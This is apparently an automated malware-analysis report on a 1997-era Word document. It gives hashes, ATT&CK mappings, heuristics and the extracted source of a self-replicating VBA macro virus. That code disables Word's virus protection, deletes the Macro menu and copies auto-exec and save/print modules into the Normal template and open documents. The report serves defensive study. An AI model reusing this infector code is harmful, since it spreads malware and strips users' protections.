Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 12ae04c97431e16a…

MALICIOUS

Office (OLE)

33.0 KB Created: 1997-01-29 21:48:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f0b7981d32dce592591213f420b99189 SHA-1: 1b65c2da84ba99d6e45c09ab25d9b55278b4b116 SHA-256: 12ae04c97431e16a54d62780b5902b3a5437418753e3a5ab3357546053d76a0f
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, specifically triggering AutoOpen and AutoClose, indicating an attempt to execute code upon document opening and closing. The script copies VBA components to the Normal template and the active document, which is a common technique for establishing persistence. The specific macros copied (AutoOpen, AutoClose, ArchivoGuardar, etc.) suggest a focus on controlling document saving and printing actions, potentially to evade detection or ensure continued execution.

Heuristics 4

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1760 bytes
SHA-256: 630661b82b6778db7d939edac8cd63f0a46e5207403e08a2c540cca47573e688
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"
Sub MAIN()

On Error Resume Next



Options.VirusProtection = False
CommandBars("Tools").Controls("Macro").Delete

Dim modulo(6) As String
Dim n As Integer




n = 6
modulo(1) = "AutoClose"
modulo(2) = "AutoOpen"
modulo(3) = "ArchivoGuardar"
modulo(4) = "ArchivoGuardarComo"
modulo(5) = "ArchivoImprimir"
modulo(6) = "ArchivoImprimirPredeter"


For m = 1 To n

existe = False

For Each VBComponent In NormalTemplate.VBProject.VBComponents
    
    If VBComponent.Name = modulo(m) Then
            existe = True
    End If
Next VBComponent

If Not existe Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
            Destination:=NormalTemplate.FullName, Name:=modulo(m), _
            Object:=wdOrganizerObjectProjectItems
End If

existe = False

For Each VBComponent In ActiveDocument.VBProject.VBComponents
    
    If VBComponent.Name = modulo(m) Then
            existe = True
    End If
Next VBComponent

If Not existe Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, _
            Destination:=ActiveDocument.FullName, Name:=modulo(m), _
            Object:=wdOrganizerObjectProjectItems
End If

Next



Documents.Save NoPrompt:=True, OriginalFormat:=wdWordDocument




End Sub


Attribute VB_Name = "ArchivoGuardar"

Attribute VB_Name = "ArchivoGuardarComo"




Attribute VB_Name = "ArchivoImprimir"


Attribute VB_Name = "ArchivoImprimirPredeter"